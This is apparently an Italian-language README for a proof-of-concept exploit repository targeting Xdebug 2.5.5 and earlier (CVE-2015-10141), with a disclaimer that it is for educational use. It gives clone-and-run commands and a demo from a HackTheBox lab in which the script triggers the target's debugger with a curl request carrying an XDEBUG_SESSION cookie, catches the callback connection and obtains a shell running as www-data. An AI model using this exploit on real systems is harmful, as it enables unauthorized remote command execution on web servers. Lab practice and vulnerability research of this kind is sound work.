
Script di exploit proof-of-concept per Xdebug 2.5.5 e versioni precedenti (CVE-2015-10141).
Exploit Python personalizzato per Xdebug ≤ 2.5.5 (CVE-2015-10141).
Questo repository contiene il mio exploit di prova di concetto (PoC) per la vulnerabilità di esecuzione remota di codice in Xdebug nelle versioni 2.5.5 e precedenti.
Lo script sfrutta il protocollo di debug non autenticato esposto sulla porta 9000 per ottenere l'esecuzione remota di comandi.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
Quando richiesto, inserisci l'IP del target su cui è ospitato Xdebug.
Dimostrazione dal mio recente write-up di HackTheBox Olympus (Medium) :
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Questo progetto è stato creato esclusivamente a scopo didattico.
Non utilizzare questo exploit contro sistemi senza un'autorizzazione esplicita. Non sono responsabile di qualsiasi uso improprio di questo codice.